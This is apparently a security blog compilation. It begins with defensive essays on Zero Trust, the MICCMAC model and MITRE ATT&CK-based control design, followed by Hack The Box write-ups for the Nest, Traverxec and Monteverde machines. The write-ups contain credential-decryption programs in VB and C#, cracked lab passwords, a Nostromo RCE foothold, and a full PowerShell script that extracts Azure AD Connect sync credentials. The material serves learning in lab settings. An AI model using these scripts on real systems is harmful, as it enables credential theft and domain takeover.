  3. Flexibility: The Zero Trust model is adaptable and can be applied to a wide range of environments, including cloud, mobile, and on-premise networks.

Limitations
  1. Implementation Complexity: Transitioning to a Zero Trust model can be complex, requiring substantial changes to existing network architectures and policies.
  2. Cost: Implementing Zero Trust Security can be expensive, requiring significant investments in new technologies and training.
  3. User Experience: The strict access controls of Zero Trust Security can potentially impact user experience and productivity if not implemented carefully.


In the ever-evolving cyber threat landscape, traditional security architectures often fall short of effectively protecting organizations. Recognizing these shortcomings, Richard Bejtlich introduced Defensible Network Architecture in his 2004 book The Tao of Network Security Monitoring. The concept was refined in 2008 with Defensible Network Architecture 2.0, which introduces the MICCMAC model: Monitored, Inventoried, Controlled, Claimed, Minimized, Assessed, and Current.

Understanding MICCMAC

The MICCMAC model is a holistic and strategic approach to cybersecurity, incorporating seven key principles:

  • Monitored: The model emphasizes the deployment of security monitoring, Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), and other tools to actively monitor network traffic for potential threats.
  • Inventoried: Organizations are urged to maintain a comprehensive inventory of all hosts and applications within their network. This helps identify unauthorized devices or applications quickly.
  • Controlled: By implementing ingress and egress filtering, organizations can manage and restrict network traffic, reducing potential attack vectors.
  • Claimed: Assigning ownership to all systems enhances accountability for their security, fostering a sense of responsibility within the team.
  • Minimized: Reducing the attack surface by limiting unnecessary services and applications decreases the number of potential entry points for attackers.
  • Assessed: Regular vulnerability assessments help identify potential weaknesses in the network, allowing for timely mitigation.
  • Current: Ensuring all systems are up-to-date with the latest patches and security updates is a crucial element of the MICCMAC model.
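As a rough illustration of the Inventoried and Minimized principles (the hosts and services below are made up), an audit script could compare what is observed on the network against the approved inventory:

```python
# Hypothetical MICCMAC-style check: flag hosts missing from the inventory
# (Inventoried) and services running outside the approved set (Minimized).
APPROVED_HOSTS = {"web01", "db01"}
APPROVED_SERVICES = {"web01": {"https"}, "db01": {"postgres"}}

def audit(observed):
    """observed: {host: set_of_services}. Returns (unknown_hosts, excess)."""
    unknown_hosts = set(observed) - APPROVED_HOSTS
    excess = {
        host: services - APPROVED_SERVICES.get(host, set())
        for host, services in observed.items()
        if host in APPROVED_HOSTS and services - APPROVED_SERVICES.get(host, set())
    }
    return unknown_hosts, excess

observed = {"web01": {"https", "telnet"}, "rogue01": {"ssh"}}
print(audit(observed))  # -> ({'rogue01'}, {'web01': {'telnet'}})
```

Feeding nmap or asset-discovery output into a check like this makes the Inventoried principle continuously enforceable rather than a point-in-time exercise.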

Benefits and Limitations of MICCMAC

Benefits
Despite its simplicity, the MICCMAC framework boasts several advantages over traditional security models.

  • Enhanced Intrusion Resistance: By incorporating a comprehensive and proactive security strategy, MICCMAC helps organizations improve their resistance to intrusions, even when absolute prevention is impossible.
  • Improved Security Posture: The framework’s focus on continuous monitoring, assessment, and improvement leads to a more robust and resilient security posture.
  • Increased Accountability: The principle of system ownership encourages a culture of responsibility and security awareness across the organization.
  • Reduced Attack Surface: Limiting unnecessary services and applications results in fewer potential entry points for attackers, reducing the overall risk.
  • Strategic Planning: With its emphasis on long-term commitment to better security, MICCMAC enables organizations to develop a more comprehensive and strategic approach to their cybersecurity efforts.

Limitations
While MICCMAC offers a more holistic approach to cybersecurity, it’s not without its limitations.

  • Oversimplification: The framework’s simplicity, while beneficial in some respects, can also be a disadvantage. It may not cover all aspects of an organization’s unique security needs, necessitating supplemental strategies.
  • Reliance on Human Intervention: MICCMAC relies heavily on human intervention for monitoring, assessing, and maintaining systems. This could be prone to human error and might not be scalable for larger organizations.
  • Requires Skilled Personnel: The model’s effectiveness depends on the organization’s ability to hire and retain skilled security professionals who can implement and manage the security measures.
  • Limited Automation: Unlike some more modern security frameworks, MICCMAC does not explicitly incorporate automation, which can help scale security efforts and reduce human error.

In conclusion, the MICCMAC model represents a significant evolution from traditional security architectures. Its emphasis on holistic and proactive security practices can enhance an organization’s ability to defend against the increasingly complex cyber threat landscape. However, it is crucial to consider its limitations and supplement the framework as needed to align with your organization’s unique security requirements.

Architecting for the kill chain

The MITRE ATT&CK framework can be a great resource for tracking and reviewing the kill chain and methodology used by threat actors. As part of a recent move to security architecture, I got interested in how to design defence in depth mapped to adversarial kill chains and MITRE, so I could better review where controls were weak and what mitigations could be put in place. Using AttackIQ I found some decent resources.

MITRE ATT&CK is a free, globally accessible tool and an impressive way to look through the different tactics, techniques and procedures (TTPs) used by Advanced Persistent Threat actors worldwide. Under MITRE, tactics are the technical goals, techniques are how a goal is achieved, and procedures are the specific implementations of techniques. Using this we can identify our crown jewels to protect, and identify the procedures and techniques to layer our defences around.

Before we go into MITRE, we need to understand how to help structure our approach for designing our defences. We will be looking at the standard methodology of Plan – Design – Implement – Measure.

Plan
In the plan phase we should review business objectives, threats (known and assumed) – ideally these should be tracked as current risks in the risk register – and the resources available to us. Here we look at the frameworks we want to use (SANS Critical Controls, NIST CSF), regulatory drivers (NIS-D) and contractual requirements. To ensure the plan covers our threats, we must gather information through Threat Intelligence or other methods on what those threats are. This information should feed our overall strategy and include:

  • Your organisation’s security team.
  • Third party sources like MITRE, CISA and Searchlight.
  • Manual searches through Shodan, Google or darknet forums.

For MITRE we can use our teams and our understanding of the organisation’s industry to identify the threats and APTs facing the organisation, and then, using the TTPs for those groups, start identifying mitigating controls. A group I picked at random is APT12; here we can see this group uses:

  • Spear Phishing with malicious attachments (Initial Access).
  • Exploitation for Client Execution and Malicious Files (Execution).
  • DNS Calculation and Bidirectional Communication (Command and Control).
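The mapping exercise can be sketched as a simple coverage check; the technique-to-control pairs below are illustrative placeholders, not an authoritative extract of ATT&CK:

```python
# Hypothetical sketch: map a group's observed techniques to the controls
# we already have, and surface the techniques with no mitigation in place.
GROUP_TTPS = {
    "APT12": ["Spearphishing Attachment", "Malicious File", "DNS Calculation"],
}
DEPLOYED_CONTROLS = {
    "Spearphishing Attachment": ["email filtering", "user training"],
    "Malicious File": ["application allow-listing"],
}

def coverage_gaps(group):
    """Return the group's techniques that have no deployed control."""
    return [t for t in GROUP_TTPS[group] if not DEPLOYED_CONTROLS.get(t)]

print(coverage_gaps("APT12"))  # -> ['DNS Calculation']
```

Even a crude table like this makes gaps visible: here the command-and-control technique has no mitigating control, so that is where design effort should go first.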

Review all the threat groups in MITRE that could target your organisation and try to pick out commonalities in their TTPs when designing the controls needed. While MITRE can give us generalised information on adversaries, purple teaming can really build on this to give business-specific context. By linking in your SOC heroes and vulnerability villains you can produce a better understanding of how the MITRE threats and TTPs fit within your organisation’s existing defences, which can help build more efficient controls around them.

Breach & Attack Simulator tools can also be used with wargaming and tabletop exercises to help tie together the strategy and highlight gaps that need addressing.

Design
With the strategy of what we need to do completed we must now turn this into a blueprint with tooling requirements, processes defined and drawn up, the operating model that will govern the programme and any other items that need to be considered to protect against the adversaries. The best design would follow a process and people-based approach before looking at tools to supplement and automate the controls.

MITRE can assist here, as it lists recommended mitigations for threat actors’ TTPs. While these can be high level, they are helpful as the base of our design framework. MITRE’s vendor evaluations can supplement traditional vendor assessment reviews like Gartner’s, helping tie tooling to the mitigations for specific TTPs.

Using the BAS tools and wargames from the planning stage, we can feed those results into our tool assessments to get the right mixture of technologies for the organisation’s threats.

Implement
During this phase we document our policies and procedures and put our processes in place. Staff upskilling takes place, and any tools are acquired and deployed. At each stage of the implementation process, and with each new tool that is deployed, BAS and wargames should be conducted as continuous assessments to make sure the tooling selection from the design phase and the strategic decisions from the planning stage are having the desired effect.

Measure
If it cannot be measured, it does not exist – a hard-learned lesson for many auditors, but a valuable one. After the programme has been successfully planned, mapped out and deployed, we must define our SLAs, KPIs and other metrics to ensure each part is operating effectively – doing this early can ease the turmoil of SOC 2 and other control effectiveness audits.

The measure phase is the BAU phase and includes managing, operating, and maintaining the security posture, and it must have a feedback loop back to the planning phase. Continually reviewing the effectiveness of controls against new and emerging threats – with the expertise of the organisation’s security teams, assisted by wargaming and BAS – ensures security does not stand still and continually improves. TRAM, an open-source tool that ties threat intelligence into MITRE’s ATT&CK framework, can also be leveraged to improve the mapping.

Nest
One of VBScrub’s boxes on Windows, this one focuses heavily on reversing applications to crack credentials.

Run Nmap

Only 445 is open? Let’s run again with the -p- flag to confirm; this is feeling like another evil-winrm box.

Foothold Enumeration

Running a quick nmap scan for vulnerabilities doesn’t give us anything.

We get the hostname.

Enum4Linux doesn’t get us much, access is denied for most checks.

Smbclient gives us the directories, so let’s play around and see what’s here.

We can access the Secure$ share but not the actual files.

We don’t have access to any of the Users directories.

And SMBmap doesn’t give us anything to work with.

We switch to Windows and map a drive to quickly run through it, and we find the foothold credentials in the Data folder.

And we have our foothold as TempUser.

User enumeration

We have greater access with TempUser, so let’s keep going through the files.

In the Notepad++ config we can see C.Smith has a history file in \Secure$\

We can’t list the IT folder, but we know Carl\ exists.

We take a chance navigating to Carl’s directory and, awesome, we have some permissions here. Let’s see what’s inside…

The first few files are useless, but it looks like Carl has hardcoded some of his credentials for a VB program in RU_Config.xml.

We can see many Public Property Username/Password references in different files, but nothing we can use.

We find the RU_Config.xml file in the Data fileshare.

Sure enough, we find the user and a hashed or encrypted password. None of the files we saw earlier had extra information for us, but we did find some interesting VB files that seem relevant. We go through them and find some interesting cryptography functions:

Key pieces of information we will need are:

    Dim cipherText As String = "fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE="
    Dim passPhrase As String = "N3st22"
    Dim saltValue As String = "88552299"
    Dim passwordIterations As Integer = 2
    Dim initVector As String = "464R5DFA5DL6LE28"
    Dim keySize As Integer = 256

So we now have the information we need: we know how the tool encrypts and decrypts passwords, and we have the hardcoded default passphrase, salt, etc. We build the below code in Visual Studio, using the RU-Scanner code as the base.

Imports System
Imports System.IO
Imports System.Text
Imports System.Security.Cryptography
Imports System.Text.Encoding
Imports Microsoft.VisualBasic
Module Program
    Sub Main()
        Dim cipherText As String = "fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE="
        Dim passPhrase As String = "N3st22"
        Dim saltValue As String = "88552299"
        Dim passwordIterations As Integer = 2
        Dim initVector As String = "464R5DFA5DL6LE28"
        Dim keySize As Integer = 256

        Dim initVectorBytes As Byte()
        initVectorBytes = System.Text.Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = System.Text.Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = System.Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, saltValueBytes, passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, decryptor, CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, 0, plainTextBytes.Length)


        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, 0, decryptedByteCount)

        ' Output the recovered plaintext so we can actually see the password
        Console.WriteLine(plainText)

    End Sub
End Module

Running this, we see the password is xRxRxPANCAK3SxRxRx.

We have the user flag.

Enumerating User 2

Now we have user 2, so let’s go back to enumerating the SMB shares. SMB is still the only tool we can use; the box is fun but very CTF-ish.

Looks like there is a port open for HQK queries that our NMAP missed.

Running strings against the HQKLDAP.exe file we found doesn’t give us much information, but when we disassemble it we see the version is 1.2.0. Googling suggests this isn’t a real tool, so we shouldn’t expect public exploits.

Decompiling the exe and going through the code doesn’t give us any answers.

Our Nmap scan on the port gives us feedback, including commands we can send to the server. Maybe telnet is the answer here?

So it looks like we have a simple interface to this service through telnet. We have an option to debug the service but will need a password to do so. Carl’s password isn’t helping us, so we go back to the empty text file we found and see if it holds the password.

After poking around with the file we find a handy smbclient command, allinfo, which shows us two streams, including one password stream of 15 bytes.

We try to get this stream and we have potentially got a password: WBQ201953D8w. Let’s try it with telnet first; if it isn’t accepted we will need to check the exe code to see what we need to do.

It is accepted. We have 3 new commands, Service, Session and ShowQuery.

So we can see some info for the queries but nothing that helps us, we also cannot leave the 1-3 range of the app.

We can’t seem to run any of these queries.

We also can’t navigate to the network location. Let’s review the decompiled .exe we found in Carl’s home directory again. We see a cryptography section in the code that mimics the functionality we used to get user, but the method it uses (the IV, salt, etc.) is slightly different – and even once we know how to decrypt this password, we still need to find the encrypted password itself.

After scratching our heads for a while, we realise we can use the showquery, list and setdir commands to navigate around the application directory, and doing this we find the administrator credentials, including an encrypted password: yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

namespace Decrypt
{
    class decrypt
    {
        static void Main(string[] args)
        {
            string cipherText = "yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=";
            string passPhrase = "667912";
            string saltValue = "1313Rf99";
            int passwordIterations = 3;
            string initVector = "1L1SA61493DRV53Z";
            int keySize = 256;

            byte[] bytes1 = Encoding.ASCII.GetBytes(initVector);
            byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue);
            byte[] buffer = Convert.FromBase64String(cipherText);
            byte[] bytes3 = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations).GetBytes(keySize / 8);
            AesCryptoServiceProvider cryptoServiceProvider = new AesCryptoServiceProvider();
            cryptoServiceProvider.Mode = CipherMode.CBC;
            ICryptoTransform decryptor = cryptoServiceProvider.CreateDecryptor(bytes3, bytes1);
            MemoryStream memoryStream = new MemoryStream(buffer);
            CryptoStream cryptoStream = new CryptoStream((Stream)memoryStream, decryptor, CryptoStreamMode.Read);
            byte[] numArray = new byte[buffer.Length + 1];
            int count = cryptoStream.Read(numArray, 0, numArray.Length);
            string plaintext = Encoding.ASCII.GetString(numArray, 0, count);

            // Output the recovered plaintext password
            Console.WriteLine(plaintext);
        }
    }
}
We put together this C# code using the decompiled source code as a base, and run it.

Success – the password for admin is XtH4nkS4Pl4y1nGX.

We log in with this credential and are able to get the key!

The big lessons learned here, which cost me a lot of time, were firstly to enumerate all the things and make note of findings that might not be used until later, and secondly to learn more about the applications I am using – even custom applications – as that can help with enumeration.

Traverxec
This box is a mixture of CVEs, misconfigurations and GTFOBins.

Run Nmap

The quick scan shows us that a webserver and SSH are open. We will run a more intensive scan to double check, and get dirb running. We also see the webserver is Nostromo 1.9.6. While those scans run, let’s research this.

Run Dirb

Nostromo exploit

We see there is an RCE for this version.

Lets give CVE-2019-16278 a try.

We have RCE! 😊 Let’s try to get a shell before proceeding; we try for a bash shell.

We setup a simple python webserver to host our shell.

We are able to upload our shell to /tmp

We run it

And we get shell! Time to move to user enumeration.

Enumerating for user

We see our target user David.

Going through the server bit by bit we see the Nostromo config file, and this gives us a lot of good info – the server admin name and the location of the password in .htpasswd.

We have the password hash – now let’s crack it!

Running john on the hash gets us the password: Nowonly4me

We aren’t able to SSH with these credentials, so they must be for something else – let’s keep looking.

Checking out the man page for Nostromo, it looks like we can navigate to the home directories because of how the server is set up. Let’s try it.

The web page itself gave us nothing, and after tearing our hair out for several hours we try to cd directly to the directory… and it works… ouch.

Going through the public_www folder we find a subdirectory that is quite interesting. It looks like we have a zipped SSH key – let’s unzip it and get David’s private key.

We have issues running john to crack the password-protected RSA key. After some googling we find a script that will run a dictionary attack against the file, and we find the password to the private key is hunter. Let’s try to SSH as David now.

We got user.txt and ssh access to David!

Enumerating to root.

Shortly after starting to explore as David, we find a shell script that lets us use sudo for the journalctl command. Dusting off our trusty GTFOBins spellbook, we find the incantation we need:

After some playing around we were able to identify the correct place to enter the GTFOBin command and get a root shell. Happy days.

An interesting box – the foothold and root were easy, but user took ages to figure out!

Monteverde
This is an interesting box that mixes lazy admins with the risks of cloud-based authentication.

Run nmap

For the first time in HTB, nmap says the host is down. I wonder if somebody has been messing with the box or if it’s part of the challenge. Let’s force Nmap to scan even though the box shows as down by using the -Pn flag.

Interesting – they have TCP Wrappers enabled. We can see that LDAP, SMB, DNS and Kerberos ports are open by looking at the port numbers, but there is some obfuscation. As this seems to be a Windows box, let’s enumerate with enum4linux and follow up findings with Impacket to see if we can find a way in.


A decent bit of information – we now have users (including a juicy-sounding SABatchJobs account), the domain and some groups. Maybe we should try some Kerberoasting like we learned about with Sauna.

Kerberos enumeration

Reviewing the blog, let’s use kerbrute to confirm the usernames.

Impacket and Kerberoasting seem to be a dead end, so let’s try enumerating some more with SMB.

SMB enumeration.

We confirm SMB is running with CME and an additional nmap scan. We recently discovered the rpcclient tool, which should give us a low-privilege session over a null connection. Using this guide, we proceed:

We find additional information on privileges and are able to drill down into the user accounts we found previously. We see only three accounts have logged in before – let’s focus on these, as we know they are good.

SMB bruteforce

After playing around with these three usernames, we ran into issues with both MSF and CME. Trying rockyou as the password list didn’t work for us, until we started trying the usernames as passwords and found SABatchJobs’ password was SABatchjobs. Bighead would be proud.

We did spend about three hours trying to get smbclient to work – the quarantine and coffee shortages are having an impact on my life – but luckily literally the first thing we checked held the second user’s password, for mhope. I am a ball of luck right now! 😊 When we ran CME for WinRM we found it was open, so using evil-winrm, a tool we used in a previous HTB, we can try for a shell.

Looks like we are successful.

And we have user.

Evil-Winrm enumeration

Starting to enumerate with WinRM, we check the services and see the big things running on this box are SQL Server and Azure AD Connect. We will need to enumerate with some scripts though.

We upload PowerSploit, and Sherlock.

None of these tools give us anything to work with, box seems solid.

A friend reminds us to use the /all parameter for whoami, and it shows us that mhope is in the MEGABANK\Azure Admins group. This stands out as suspicious, but let’s enumerate SQL Server first as it seems more likely than Azure.

Enumerating SQL Server

We can see this is SQL Server, so let’s focus on that. Googling gives us an enumeration guide we will use, as SQL Server and us are not a good match 😮

Trying to use MSF to log in as mhope doesn’t work – it seems mhope isn’t allowed to access SQL. Going back to googling and researching what we found so far, a wild blog suddenly appears that chains our two findings together. Best of all, VBScrub wrote it – a very good hacker who always offers awesome advice on the HTB forums.

The exploit

We read through the original exploit VBScrub linked to and use his code to create a ps1 file. Reading through the code, there doesn’t seem to be anything we will need to change. Now let’s upload it with WinRM, execute it, and see what happens.

We upload it as normal, and when we run it evil-winrm cuts out. We didn’t think of it at the time, but we should have loaded the script as a module into Evil-WinRM – we didn’t realise our mistake. We did notice it was showing the file being executed from my Kali machine. Reading back over the blog we see that “you also need to make sure the mcrypt.dll from the download link is in the same directory the program is in.” We try this, and try adding mcrypt.dll to our path, but neither is successful – it keeps cutting out.

We decided to run the following code, which we found, line by line; it’s different from the above as it hardcodes the mcrypt.dll location:

# Azure AD Connect stores its configuration in the local ADSync database
# (server/database values here are what worked on this box)
$server = "localhost"
$db = "ADSync"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=$server;Database=$db;Initial Catalog=$db;Integrated Security=True;"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)

$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)

add-type -path "C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll"
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerXML}}

"[+] Domain:  " + $domain.Domain
"[+] Username: " + $username.Username
"[+]Password: " + $password.Password

This is pretty awesome, we get the credentials.

And we are admin with the root.txt 🙂